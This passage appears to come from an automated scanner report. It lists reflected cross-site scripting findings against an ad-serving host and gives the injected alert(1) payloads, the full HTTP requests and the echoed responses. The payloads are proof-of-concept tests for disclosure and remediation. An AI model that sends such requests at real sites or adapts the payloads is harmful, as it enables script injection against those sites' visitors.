Set-Cookie: JSESSIONID=46E994820BEA60E036BF5BE397EDBBC0; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requr
...[SNIP]...

1.236. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10fb9"-alert(1)-"6e53e38484e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5469F15AA88EEE3255E56F24ACA66C81; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : ""
...[SNIP]...

1.237. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c9e"-alert(1)-"e76675c569d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
p%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqq
...[SNIP]...

1.238. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac792"-alert(1)-"f774c7feed6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=49CCDDF0805E1F3B79B8DDA62CB254A9; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqquery
...[SNIP]...

1.239. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e4b"-alert(1)-"80809c3de6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77AF6CFE5EC6234805A7DAAF7F27D4BF; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:36 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
news.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "
...[SNIP]...

1.240. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected